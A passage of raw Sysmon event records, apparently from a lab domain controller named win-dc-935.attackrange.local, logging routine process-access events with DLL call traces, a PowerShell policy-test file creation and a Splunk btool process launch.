dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002075Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.836{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000002074Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.820{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002073Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.820{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002072Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.820{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002071Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.820{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002070Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.820{10ACEC4A-8551-5FCF-3200-000000009101}24723496C:\Windows\system32\DFSRs.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\wmidcom.dll+58a6|C:\Windows\system32\wmidcom.dll+5464|C:\Windows\system32\wmidcom.dll+5495|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002069Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.820{10ACEC4A-8552-5FCF-4F00-000000009101}3916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_1vfwyz04.20m.ps12020-12-08 13:53:22.820 10341000x80000000000000002068Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-5300-000000009101}2724C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002067Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002066Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002065Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002064Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002063Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002062Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002061Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002060Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002059Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002058Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-5300-000000009101}2724C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002057Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8552-5FCF-5200-000000009101}30002124C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-8552-5FCF-5300-000000009101}2724C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002056Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.812{10ACEC4A-8552-5FCF-5300-000000009101}2724C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-8552-5FCF-5200-000000009101}3000C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000002055Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002054Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000002053Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002052Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002051Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\